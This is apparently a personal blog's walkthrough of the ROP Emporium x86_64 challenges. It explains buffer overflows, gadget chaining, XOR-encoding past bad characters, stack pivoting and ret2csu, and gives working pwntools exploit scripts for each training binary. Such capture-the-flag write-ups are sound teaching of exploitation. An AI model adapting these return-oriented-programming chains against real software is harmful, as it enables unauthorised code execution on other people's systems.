ROPEmporium x86

ROP Emporium is a series of challenges desired to introduce fundamental return-oriented programming (ROP) techniques. Whenever a buffer overflow vulnerability but the stack has its NX bit on (i.e., you cannot execute data on stack), ROP allows us to chain existing snippets of instructions (so-called gadgets) in the program image to achieve what we want. I will be using GDB + pwndbg and pwntools for the write-up. Although not necessary, I also use debuginfod for GNU libc debug information. You can also find the complete Python scripts for each challenge here. After the first challenge, I will omit the code for finding the offset of stored RIP and sending the payload since they are the same.

Before You Start

If you haven’t yet, consider reading the beginners’ guide on the ROP Emporium website first to get a taste of common tools and techniques for ROP.

ret2win

ret2win is a simple buffer overflow challenge with a twist.

Investigation

Let’s check out the binary in gdb first with gdb ret2win:

There are no protections in this challenge except NX, which means that we have to use ROP.

The main function simply prints messages and calls pwnme()

pwnme() is a bit longer. We can see that at the beginning of the function (<+8>), only 0x20 bytes are allocated for the buffer. Later pwnme() uses read() to prompt for input, which does not check the input size and is vulnerable to buffer overflow.

Taking a quick look in radare reveals that there is a ret2win() function that we should return to.

In case you need a refresher on the stack layout, here’s how our buffer overflow attack will look like on the stack: the input will overwrite the buffer and saved rbp with garbage values and set the return address of pwnme() to ret2win() (0x400756 in the image).

Low stack address
 
|   rbp - 0x20   | <- start of buffer
|  ...buffer...  |
|  ...buffer...  |
|  ...buffer...  |
|  ...buffer...  |
|    saved rbp   | <- rbp
| return address | <- rip
 
High stack address

Build the Payload

We are now ready to craft the payload, which consists of padding (garbage values for buffer and saved rbp on stack) and the return address. To find the exact number of characters needed for the padding (the “offset”), we can use cyclic from pwntools to generate a de Bruijn sequence and use cyclic -l (or cyclic_find() in Python) to calculate the offset from captured rip.

We found a segfault

Crash the program with a cyclic pattern:

We found the offset pattern:

In the disassembly, we can see that we have set the return address to 0x6161616c6161616b using the cyclic sequence. We only need the first 4 bytes to find the offset, which for little endian, is 0x6161616b, since the least significant bytes are put first.

This process of finding the offset can be automated using pwnlib (pwntools) in Python. Here’s the relevant code borrowed from GitHub:

from pwn import *
 
# set up pwntools for this binary
elf = context.binary = ELF('ret2win')
# show everything that is being sent/received
context.log_level = 'debug'
 
# launch the binary
io = process(elf.path)
# send the cyclic pattern
io.sendline(cyclic(128))
# wait for the crash to happen
io.wait()
# grab the core dump
core = io.corefile
# the rsp points to the return address we overwrote
stack = core.rsp
# need the first (least significant) 4 bytes to determine offset
pattern = core.read(stack, 4)
 
offset = cyclic_find(pattern)

To build the payload, we can use p64() to pack address as 64-bit little-endian pointer:

payload = b''               # raw bytes needed
payload += b'a' * offset    # overwrite buffer with garbage
payload += p64(0x400756)    # address of ret2win()

Alternatively, pwnlib provides a convenient function flat() for building payloads, which automatically calls cyclic_find() and packs addresses for you. Note that elf.symbols.<symbol> gives the PLT address, not the actual runtime address.

payload = flat(
    { pattern: elf.symbols.ret2win }
)

Stack Alignment

For now we can save the payload to a file and check if it works in gdb:

with open('payload.bin', 'wb') as f:
    f.write(payload)

Turns out it doesn’t:

Here we can see the infamous movaps instruction:

RSP is not 16-byte aligned:

From the screenshots above we see that the payload did work, but the program crashed at the movaps instruction. With a quick search we find that movaps requires the stack pointer to be 16-byte aligned (must end in 0x0). We can quickly fix this by adding another address before ret2win() address, since the address is an 8-byte pointer and we are 8 bytes off. To ensure that no side effects are produced, we can use a ret gadget in the binary (a gadget is a continuous set of instructions that ends in ret, jmp, call, etc so that you can chain multiple of them together to do what you want). The ret gadget will do nothing other than just popping the next address on the stack into RIP.

ropper -f ret2win:

Our updated payload with the addition of the ret gadget:

payload = flat(
    { pattern: 0x40053e },  # ret;
    elf.symbols.ret2win     # ret2win()
)

Our payload works:

Automated Exploitation

While we could just write the payload to a file and send it to the program through stdin, it does get a bit annoying when you are testing things. From now on, we can keep writing the file for debugging purposes but use pwnlib’s utilities to start a process. As we have already done this when automating the offset-finding process, this will look pretty much the same:

io = process(elf.path)
io.sendline(payload)
io.recvuntil("Here's your flag:")
 
flag = io.recvall()
success(flag.decode('utf-8'))

You can view the complete script here.

split

Call `system()`

The pwnme() method can be exploited the same way with a buffer overflow.

pwnme() decompilation:

We don’t have a simple ret2win() function anymore, but the program does import system() from libc, which can be used to print the flag.

Function list in radare2:

Simply returning to system() wouldn’t work, since it requires a command as an argument. In x86-64, arguments are passed through registers (more information here). The first argument is stored in rdi, so we just need to find a gadget to set rdi. Looking at ropper output, we find pop rdi; ret; which does exactly what we want. To use the gadget, simply add the gadget address to the payload followed by the data to be popped.

Setter gadget in ropper:

We still need the actual string. Fortunately, the challenge binary already contains the string /bin/cat flag.txt in the .data section:

Command string found in split:

Payload & Solution

We can use the same code to find the offset for the return address. After some quick testing, we find that this binary also suffer from the same movaps stack alignment issue, which can be resolved with a ret gadget. In addition, instead of using the address of the command string from rabin2 output, we can use pwnlib’s builtin search function to make the code a bit more readable. Note that pwnlib has builtin ROP tools, but I prefer sticking to flat() since in future challenges we won’t be able to find straight-forward gadgets anymore.

cmdstr = next(elf.search(b'/bin/cat flag.txt'))
system = elf.symbols.system
 
payload = flat(
    { offset: 0x000000000040053e },     # ret (movaps stack alignment)
    0x00000000004007c3,                 # pop rdi; ret;
    cmdstr,                             # rdi = "/bin/cat flag.txt"
    system                              # libc system()
)
open('payload.bin', 'wb').write(payload)

We are now ready to feed the program our payload:

io = process(elf.path)
io.recvuntil(b'> ')
io.sendline(payload)
io.recvuntil(b'Thank you!\n')
print(io.recvline().decode('utf-8'))

View the complete solution here.

callme

The callme challenge requires us to callme three functions (callme_{one,two,three}()) in sequence and pass the same three arguments to each (0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d), which basically means that we need to find gadgets that let us modify three registers used for passing arguments. You can find the complete solution below.

Which Registers?

We have the same buffer overflow vulnerability in pwnme().

As for the function calls, we can open libcallme.so in gdb to check what arguments the functions accept and from which registers. The three registers used in order are rdi, rsi, and rdx.

Building the Payload

Run ropper -f callme and we find a convenient gadget that sets all three registers at once:

Since the arguments will be popped off the stack in order, the payload is simple:

popper gadget
argument 1 (0xdeadbeefdeadbeef)
argument 2 (0xcafebabecafebabe)
argument 3 (0xd00df00dd00df00d)
callme_one()
popper gadget
argument 1 (0xdeadbeefdeadbeef)
argument 2 (0xcafebabecafebabe)
argument 3 (0xd00df00dd00df00d)
callme_two()
popper gadget
argument 1 (0xdeadbeefdeadbeef)
argument 2 (0xcafebabecafebabe)
argument 3 (0xd00df00dd00df00d)
callme_three()

To build the payload:

popper = 0x000000000040093c  # pop rdi; pop rsi; pop rdx; ret;
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
 
payload = flat(
    { offset : popper },
    arg1,
    arg2,
    arg3,
    elf.symbols.callme_one,
 
    popper,
    arg1,
    arg2,
    arg3,
    elf.symbols.callme_two,
 
    popper,
    arg1,
    arg2,
    arg3,
    elf.symbols.callme_three,
)

View the complete code here.

write4

For write4, we have to find print the flag using the print_file() function from the shared object, however this time the binary doesn’t just contain a "flag.txt" out of no where. We will have to write the gadget to memory ourselves. The code for exploiting pwnme() and sending the payload is the exact same as the one we used before.

Write Gadget

We need a write gadget that lets us write bytes somewhere in memory so that we can pass that address to the print function. We know from the challenge page that a write gadget generally looks like mov [dest_reg], src_reg, where we write the value in src_reg to an address in dest_reg. Let’s start looking for them in ropper output.

Found a write gadget:

Popper to use with the write gadget:

write8

With the gadget we found we can easily write the entirety of the argument ("flag.txt", 8 bytes = 64 bits) into memory. The next question is where. One of the most reliable options is the .data section (I tried the stack and it didn’t work), where global and static variables are kept.

.data is writable and large enough:

Here’s the payload:

pop_r14_r15 = 0x0000000000400690  # pop r14; pop r15; ret;
write_data = 0x0000000000400628   # mov qword ptr [r14], r15; ret;
straddr = 0x00601028              # .data
pop_rdi = 0x0000000000400693      # pop rdi; ret;
payload = flat(
    { offset : pop_r14_r15 },
    straddr,
    b'flag.txt',
    write_data,
    pop_rdi,
    straddr,
    elf.symbols.print_file
)

View the complete code here.

badchars

In badchars, we find that not all bytes are acceptable as input. To bypass the badchars, we need to configure the ROP chain finder and also encode the filename using XOR then decode it in memory.

It’s XORing Time

Finding bad chars:

Using ropper with badchars option (hex-encoded):

Encoders like shikata ga nai uses many techniques to avoid bad characters, but for our purposes we can just use plain XOR. Time to find some xor gadgets:

I can’t find pop rdx, so I guess we are stuck with the first XOR gadget.

With these, we can control the first XOR gadget:

Here we find a write gadget:

We can use this to set print_file()’s argument (rdi):

One approach to avoiding the bad chars is to XOR the data ("flag.txt") with a single byte in the payload and XOR the data against the same byte in our ROP chain. While doing so, we have to make sure that everything in the ROP chain are badchar-free, meaning that we need to find the right key through trial-and-error. Since the our gadget XORs one byte at a type, we need eight iterations for the entirety of the filename.

Building Payload with a Loop

This took me quite some time to get right, but basically I had to shift the string address and try different keys to get the filename to decode correctly.

ret = 0x00000000004004ee        # ret;
pop_regs = 0x000000000040069c   # pop r12; pop r13; pop r14; pop r15; ret;
write_data = 0x0000000000400634 # mov qword ptr [r13], r12; ret;
xor_data = 0x0000000000400628   # xor byte ptr [r15], r14b; ret;
straddr = 0x00601028 + 8        # .data (shifted to avoid badchar during decode)
pop_r15 = 0x00000000004006a2    # pop r15; ret;
pop_rdi = 0x00000000004006a3    # pop rdi; ret;
key = b'0'
 
def xor_rep(m: bytes, k: bytes) -> bytes:
    return bytes([ch ^ k[i % len(k)] for i, ch in enumerate(m)])
 
# write our encoded filename to memory first
args = [
    { 40 : ret },
    pop_regs,
    xor_rep(b'flag.txt', key),  # r12
    straddr,                    # r13
    key*8,                      # r14 (r14b)
    straddr,                    # r15
    write_data,
]
# decode the filename
for i in range(8):
    args.extend([ pop_r15, straddr + i, xor_data ])
# call target function
args.extend([ pop_rdi, straddr, elf.symbols.print_file ])
 
payload = flat(*args)

View the complete code here.

fluff

For fluff we have to combine some random instructions to get a write gadget.

where gadgets

Hmm. Nothing useful here.

Let’s check out the hint:

So we have some gadgets that are not so straightforward. After reading the documentation for xlat, bextr, and stos, we find that they can indeed be combined to create a write gadget:

bextr rbx, rcx, rdx

We can use this to set rbx for the next gadget, xlat.
Bits are extracted from rcx (2nd operand) to rbx (1st operand).
We need to subtract 0x3ef2 to offset the add instruction at <+4>
Lower 8 bits (dl) of rdx (3rd operand) is treated as the bit index, and the next 8 bits (dh) specify the length of the bit vector.
We can basically set rdx[7:0] to 0 and rdx[15:8] to 64 in order to simulate mov rbx, rcx.

xlat byte ptr [rbx] (xlatb)

This uses al to index a table at [rbx] and copy a byte to al. Basically mov al, byte ptr [rbx + al].
We need to find an address that has the byte we need to write. This address is equal to rbx + al.
As for setting the source address, we could zero al, but we don’t have enough space (only 0x200) for mov eax, 0 gadgets.
We actually don’t need to zero al since we know the initial value of rax (return value of puts("Thank you!") which is 0xb).
Save al after each write. For future calls, al will be the last byte we wrote to memory.
Now that we know the value of al, we can just subtract last al value from rbx (rcx) for each call. If our desired byte is at addr, then rbx = addr - al and rbx + al == addr.

stos byte ptr [rdi], al (stosb byte [rdi], al)

This is equivalent to mov byte ptr [rdi], al.
We use this in conjunction with xlat to achieve write-what-where.

Craft the Write Gadget

# return value of puts() which is strlen("Thank you!\n")
last_al = 0xb
def write_byte(addr: int, val: int) -> list[object]:
    '''
    Write-what-where gadget
 
    Stack layout:
    ---- HIGH ----
    val     -- rdi = addr
    gadget  -> pop rdi; ret;
 
    gadget  -> xlat BYTE PTR ds:[rbx]
 
    val     -- rcx = val_addr - 0x3ef2 - last_al
    val     -- rdx = (64 << 8)
    gadget  -> pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;
    ---- LOW  ----
    '''
    global last_al
 
    # make sure val is a single byte
    val &= 0xff
    val_addr = next(elf.search(val.to_bytes(1, byteorder='little')))
    # to counterbalance the add instruction at 0x40062c
    val_addr -= 0x3ef2
    # for stosb; make sure rbx + al is still equal to the original address
    val_addr -= last_al
    # afterwards, al will be set to the byte we are about to write
    last_al = val
 
    return [
        0x000000000040062a, # pop rdx; pop rcx; add rcx, 0x3ef2; bextr rbx, rcx, rdx; ret;
        64 << 8,            # rdx[7:0] = start bit (0); rdx[15:8] = how many bits to read from rcx
        val_addr,           # modified address of the val byte
 
        0x0000000000400628, # xlat BYTE PTR ds:[rbx]; ret
 
        0x00000000004006a3, # pop rdi; ret;
        addr,               # rdi = addr
 
        0x0000000000400639  # stosb byte ptr [rdi], al; ret;
    ]
 
 
def write_bytes(addr: int, bs: bytes) -> list[object]:
    return [write_byte(addr + i, b) for i, b in enumerate(bs)]

…And Build the Payload

Building the payload is pretty trivial now that we have the write-bytes gadget.

str_addr = 0x00601028 # .data
payload = flat(
    { offset: write_bytes(str_addr, b'flag.txt') },
    0x00000000004006a3, # pop rdi; ret;
    str_addr,
    elf.symbols.print_file
)

View the complete code here.

pivot

For pivot we have to make two payloads, one for the stack and the other for the heap.

Why do we need to pivot?

While the pivot binary artificially creates the demand, there are oftentimes situations in which we may not have enough space on the stack to put all of our ROP chain without messing the buffer overflow up. If we somehow leak a heap address from the vulnerable program and write there, it is possible to pivot to the heap and put the rest of the payload there.

How do I pivot?

To pivot, simply set the rsp to the heap address you got so that instructions such as pop and ret now take values from the heap.

How do I `ret2win()`?

The basic idea is to load the GOT entry of foothold_function() and add an offset to get ret2win(). Finding the address of GOT entry can be done through rabin2 -R pivot.

You can determine the offset between foothold_function() and ret2win() in gdb.

pivot does not import ret2win():

We can determine the function address difference at runtime:

Notice how GDB doesn’t need the GOT to give you the addresses? Since foothold_function() isn’t called during normal program flow, GDB probably calculated these addresses.

Alternatively, determine function address difference using shared library:

Exploiting

To set rsp, we use the xchg gadget to swap rsp and rax. The first thing we do after we reach the heap ROP chain is go to foothold_function() to update its GOT entry. Then we do what we have to do to load the GOT entry address, add an offset to it to get to ret2win(), and then call it.

# craft payload
def build_stack_payload(heap_addr: int) -> bytes:
    return flat(
        { offset : 0x00000000004009bb }, # pop rax; ret
        heap_addr,          # we need to pivot to the heap chain
 
        0x00000000004009bd, # xchg rsp,rax; ret
    )
 
def build_heap_payload() -> bytes:
    return flat(
        elf.symbols.foothold_function, # must be on heap, since rsp has changed
        0x00000000004009bb, # pop rax; ret;
        0x601040,           # [email protected]
 
        0x00000000004009c0, # mov rax, qword ptr [rax]; ret;
 
        0x00000000004007c8, # pop rbp; ret;
        279,                # ret2win - foothold_function at runtime
 
        0x00000000004009c4, # add rax, rbp; ret;
 
        0x00000000004006b0, # call rax;
    )
 
# send payload
io = process(elf.path)
io.recvuntil(b'a place to pivot: ')
heap_addr = int(io.recvline().decode('ascii').rstrip(), base=16)
 
io.recvuntil(b'> ')
io.sendline(build_heap_payload())
io.recvuntil(b'> ')
io.sendline(build_stack_payload(heap_addr))
 
io.recvuntil(b'libpivot\n')
print(io.recvline().decode('utf-8'))

View the complete code here.

ret2csu

In ret2csu we are given a universal gadget to call the ret2win() function with arguments. For more details on the gadget, see ret2csu.

Universal Gadget

I was pretty lost trying to find suitable gadgets, so naturally I read the last paragraph on the challenge page, which hints at us that there is a “universal ROP” gadget in __libc_csu_init. It is called “universal” since every program linked against glibc will contain this gadget. The csu (“C Start-Up”) functions help libc set up programming language features (like constructors, transactional memory model, etc). When a C program starts, __libc_csu_init gets called first to set things up, then main(), and finally __libc_csu_fini to tear things down (see __libc_csu_init). Let’s take a look at the gadget:

We can see that using instructions at <+64> and <+67> we can set the rdx and rsi registers indirectly through r15 and r14, which we also have control over (<+96>). One thing is that this gadget only lets us set edi which doesn’t fit an entire argument, but we easily can find a pop rdi; ret gadget elsewhere. There are, however, two real issues with this gadget that can be fixed with a bit of planning.

We have to give call at <+73> an address that contains the address of a gadget that does not affect rdx or rsi. So the gadget’s address has to be stored in the binary somewhere for us to use it. This practically limits us to pre-existing symbols in the binary.
We have to make sure that rbp and rbx is equal, otherwise the gadget will jump somewhere else at <+84>.

Issue One

To solve issue one, we would have to find a gadget that both has minimal side effects and whose address is stored in the program image itself. One candidate is the _fini symbol:

Pwnlib will help us find a location containing the address of _fini in the binary:

_fini = next(elf.search(elf.symbols._fini.to_bytes(8, byteorder='little')))

We have to make sure that r12 + rbx * 8 == _fini for the call instruction. r12 = _fini and rbx = 0 will work.

Issue Two

Since we control rbp (<+91>), we can easily bypass the jne instruction by setting rbp to the anticipated value of rbx. Knowing that we set rbx to zero and <+77> increments rbx by one, we can just set rbp to 1.

Bringing everything together

Our payload will start at <+90> to set up the registers we need, after which we ret to <+64> to set up the arguments for ret2win(). After bypassing the jne we encounter a add rsp, 0x8 which is equivalent to a pop, so we need to add a garbage value in the payload. We then find ourselves back in the same place we set up all the registers, but this time we just have to give them garbage values to reach the ret. Remember that with this gadget we only get to set edi, so we need to ret to a pop rdi; ret gadget. Now that all three argument registers are initialized properly, we can ret to ret2win(). The payload is as follows:

rdi = 0xdeadbeefdeadbeef
rsi = 0xcafebabecafebabe
rdx = 0xd00df00dd00df00d
_fini = next(elf.search(elf.symbols._fini.to_bytes(8, byteorder='little')))
payload = flat(
    { offset : 0x000000000040069a }, # popper gadget
    0,                  # rbx
    1,                  # rbp
    _fini,              # r12
    rdi,                # r13(d) -> edi (useless)
    rsi,                # r14 -> rdi
    rdx,                # r15 -> rdx
 
    0x0000000000400680, # set up arguments
    0,                  # garbage (add rsp, 0x8)
    0,                  # rbx
    0,                  # rbp
    0,                  # r12
    0,                  # r13(d)
    0,                  # r14
    0,                  # r15
 
    0x00000000004006a3, # pop rdi; ret;
    rdi,                # rdi
 
    elf.symbols.ret2win # target function
)

View the complete code here.

Security Memo

Recent Notes

SMART

Bossa Nova

ZFS

post-rock

2024-09-27

ROPEmporium x86_64

Before You Start

ret2win

Investigation

Build the Payload

Stack Alignment

Automated Exploitation

split

Call system()

Payload & Solution

callme

Which Registers?

Building the Payload

write4

Write Gadget

write8

badchars

It’s XORing Time

Building Payload with a Loop

fluff

where gadgets

Craft the Write Gadget

…And Build the Payload

pivot

Why do we need to pivot?

How do I pivot?

How do I ret2win()?

Exploiting

ret2csu

Universal Gadget

Issue One

Issue Two

Bringing everything together

Graph View

Table of Contents

Backlinks

Call `system()`

How do I `ret2win()`?